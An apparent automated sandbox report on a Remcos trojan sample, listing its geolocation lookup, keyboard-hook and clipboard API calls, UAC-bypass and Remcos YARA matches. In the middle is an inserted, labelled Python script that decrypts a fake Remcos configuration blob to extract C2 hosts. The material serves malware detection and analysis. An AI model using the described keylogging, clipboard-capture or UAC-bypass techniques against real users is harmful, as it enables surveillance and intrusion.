Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 18_2_0041936B
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.000000000128F000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, myTuDsvNcebev.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpi5H
Source: PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpsystem32
Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: PEbZthAqV9.exe, 00000000.00000002.1830115364.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000009.00000002.1931870695.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PEbZthAqV9.exe, 00000000.00000002.1833712267.0000000005580000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmls
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 (idHook 0x0D = WH_KEYBOARD_LL, a global low-level keyboard hook; hMod NULL, dwThreadId 0)
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx

                  E-Banking Fraud

Source: Yara match | File source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
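The Yara hits above are Remcos family signatures on the unpacked payload, found both in memory of the .NET dropper (0.2.PEbZthAqV9.exe.4883170.1 and .48f8790.2) and in the injected copy (18.2.myTuDsvNcebev.exe.400000.0). Once such a region is dumped, the next thing an analyst wants is the configuration. The Python below is an added example, not code from Joe Sandbox or from this report: it decrypts a Remcos SETTINGS resource blob in the publicly documented layout (one key-length byte, the RC4 key, then RC4 ciphertext whose fields are separated by `|\x1e\x1e\x1f|` in recent builds, `||` in old ones) and pulls out the C2 list. The field names, the separator fallback and the sample blob are assumptions constructed for the example; the real resource has to be carved from the dumped PE first (for instance with pefile), and the field order checked against the build at hand.

```python
"""Decrypt and split a Remcos SETTINGS configuration blob (added example).

Layout assumed here (documented for Remcos, verify on your sample):
  blob[0]           = RC4 key length n
  blob[1:1+n]       = RC4 key
  blob[1+n:]        = RC4(key, fields joined by FIELD_SEP_NEW or FIELD_SEP_OLD)
The sample blob at the bottom is constructed in-line so the script runs
offline; it is NOT the configuration of the analysed sample.
"""
from __future__ import annotations

FIELD_SEP_NEW = b"|\x1e\x1e\x1f|"   # recent builds
FIELD_SEP_OLD = b"||"               # old builds (assumed fallback)

# Assumed positions of the first fields; the real order depends on the build.
ASSUMED_FIELDS = {0: "c2_hosts", 1: "botnet_id"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypt and decrypt are the same operation."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """Split the blob into key length, key and ciphertext, then RC4 it."""
    if len(blob) < 2:
        raise ValueError("SETTINGS blob too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("invalid key length byte %d" % key_len)
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:])


def split_fields(plain: bytes) -> list[bytes]:
    """Use the new separator if present, otherwise fall back to the old one."""
    sep = FIELD_SEP_NEW if FIELD_SEP_NEW in plain else FIELD_SEP_OLD
    return plain.split(sep)


def parse_c2(field: bytes) -> list[tuple[str, int, str]]:
    """Parse 'host:port:flag;host:port:flag'; malformed entries are skipped."""
    hosts = []
    for entry in field.split(b";"):
        parts = entry.split(b":")
        if len(parts) < 2:
            continue
        try:
            flag = parts[2].decode() if len(parts) > 2 else ""
            hosts.append((parts[0].decode(), int(parts[1]), flag))
        except (UnicodeDecodeError, ValueError):
            continue
    return hosts


def extract_config(blob: bytes) -> dict:
    """Decrypt, split and name the fields; 'c2' holds the parsed host list."""
    fields = split_fields(decrypt_settings(blob))
    cfg = {ASSUMED_FIELDS.get(i, "field_%d" % i): f.decode("latin-1")
           for i, f in enumerate(fields)}
    cfg["c2"] = parse_c2(fields[0]) if fields else []
    return cfg


def build_sample_blob(key: bytes, fields: list[bytes]) -> bytes:
    """Build a blob in the layout above. Test data only, not a real sample."""
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP_NEW.join(fields))


# Constructed fake configuration (RFC 5737 address, .invalid host).
SAMPLE_BLOB = build_sample_blob(
    b"Pass", [b"192.0.2.10:2404:1;example.invalid:2404:0", b"RemoteHost", b"1"])

if __name__ == "__main__":
    for name, value in extract_config(SAMPLE_BLOB).items():
        print(name, value)
```

If the decrypted bytes contain neither separator, the key-length byte was probably wrong (some packers prepend data to the resource); check that the first field decodes to printable `host:port` text before trusting anything else in the output.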

                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041A76C SystemParametersInfoW

                  System Summary

Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_00C1D344
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3A1EE
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3C980
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3C698
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3C689
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D364C8
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D34444
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3C970
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D3AD20
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07546148
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07540559
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07540560
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_075494E8
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_0754B498
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07546139
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_075490B0
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07549D58
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_07549920
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_0AD60E35
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 9_2_011ED344
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 9_2_0A8E0448
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00425152
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00435286
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004513D4
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0045050B
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00436510
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004316FB
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0043569E
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00443700
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004257FB
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004128E3
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00425964
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041B917
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00435AD3
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00424BC3
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00433C0B
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00434D8A
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00435F08
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: String function: 00432525 appears 41 times
Source: PEbZthAqV9.exe | Static PE information: invalid certificate
Source: PEbZthAqV9.exe, 00000000.00000002.1830115364.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000003EAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe, 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe, 00000000.00000002.1834924504.0000000007452000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe, 00000000.00000002.1836141591.0000000007930000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe, 00000000.00000002.1828093167.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe | Binary or memory string: OriginalFilenameJzWg.exe@ vs PEbZthAqV9.exe
Source: PEbZthAqV9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
